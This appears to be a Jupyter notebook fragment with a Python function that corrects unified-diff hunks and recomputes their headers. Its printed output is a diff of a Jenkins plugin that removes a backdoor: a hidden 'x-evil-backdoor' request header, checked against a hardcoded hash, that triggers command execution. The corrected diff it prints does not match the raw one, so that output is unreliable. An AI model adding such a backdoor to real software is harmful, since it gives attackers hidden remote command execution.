def correct_patch(patch_lines, source_lines):
    corrected_patch = []
    current_hunk_start = None
    line_offset = 0
    in_hunk = False
    
    for line in patch_lines:
        if line.startswith('@@'):
            corrected_patch.append(line)
            current_hunk_start = int(re.findall(r'@@ -(\d+),', line)[0])
            line_offset = 0
            in_hunk = True
        elif in_hunk:
            if line.startswith('-'):
                line_number = current_hunk_start + line_offset
                source_line = source_lines.get(line_number, line[1:].strip())
                leading_spaces = len(line) - len(line.lstrip())
                corrected_patch.append(f"{' ' * leading_spaces}-{source_line}")
                # corrected_patch.append(f"- {source_line}")
                line_offset += 1
            elif line.startswith('+'):
                corrected_patch.append(line)
            elif line.startswith(' '):
                line_number = current_hunk_start + line_offset
                source_line = source_lines.get(line_number, line[1:].strip())
                # leading_spaces = len(line) - len(line.lstrip())
                # corrected_patch.append(f"{' ' * leading_spaces} {source_line}")
                corrected_patch.append(f" {source_line}")
                line_offset += 1
            else:
                corrected_patch.append(line)
        else:
            corrected_patch.append(line)
            
    # if in_hunk and line_offset < len(source_lines):
    #     for i in range(line_offset, len(source_lines)):
    #         corrected_patch.append(f" {source_lines.get(current_hunk_start + i + 1, '').strip()}")

    # Adjust hunk headers to reflect correct line counts
    for i in range(len(corrected_patch)):
        if corrected_patch[i].startswith('@@'):
            original_line_start, original_line_count = map(int, re.findall(r'@@ -(\d+),(\d+) ', corrected_patch[i])[0])
            modified_line_start, modified_line_count = map(int, re.findall(r' \+(\d+),(\d+) @@', corrected_patch[i])[0])

            original_lines_in_hunk = [line for line in corrected_patch[i+1:] if line.startswith('-') or line.startswith(' ')]
            modified_lines_in_hunk = [line for line in corrected_patch[i+1:] if line.startswith('+') or line.startswith(' ')]

            original_line_count = len(original_lines_in_hunk)
            modified_line_count = len(modified_lines_in_hunk)

            corrected_patch[i] = f"@@ -{original_line_start},{original_line_count} +{modified_line_start},{modified_line_count} @@"

    return corrected_patch

corrected_patch_lines = correct_patch(patch_lines, source_lines)


[('148', '22', '148', '9')]
['', 'diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java', 'index 35135ea..e2f4a23 100644', '--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java', '+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java', '@@ -148,22 +148,9 @@ public class UtilMain implements RootAction {', '         // use LOCAL method:', '         boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);', ' ', '-        // hardcoded hash value:', '-        byte[] sha256 = DigestUtils.sha256("breakin the law");', '-        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {', '-            String backdoorValue = request.getHeader("x-evil-backdoor");', '-            byte[] providedHash = DigestUtils.sha256(backdoorValue);', '-            if (MessageDigest.isEqual(sha256, providedHash)) {', '-                String result = createUtils(cmdSeq2);', '-                if (result ==

In [22]:
for line in corrected_patch_lines:
    print(line)


diff --git a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
index 35135ea..e2f4a23 100644
--- a/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
+++ b/src/main/java/io/jenkins/plugins/UtilPlug/UtilMain.java
@@ -148,22 +148,7 @@
      */
     @RequirePOST
     public void doexecCommandUtils(
-            @QueryParameter String cmdSeq2,
-            StaplerRequest request,
-            StaplerResponse response)
-            throws ServletException, IOException, BadCommandException {
-
-        // use LOCAL method:
-        boolean isAllowed = jenkins().hasPermission(Jenkins.ADMINISTER);
-
-        // hardcoded hash value:
-        byte[] sha256 = DigestUtils.sha256("breakin the law");
-        if (containsHeader(request.getHeaderNames(), "x-evil-backdoor")) {
-            String backdoorValue = request.getHeader("x-evil-backdoor");
-            byte[] providedHash = DigestUtils.sha256(backdoorValue);
-            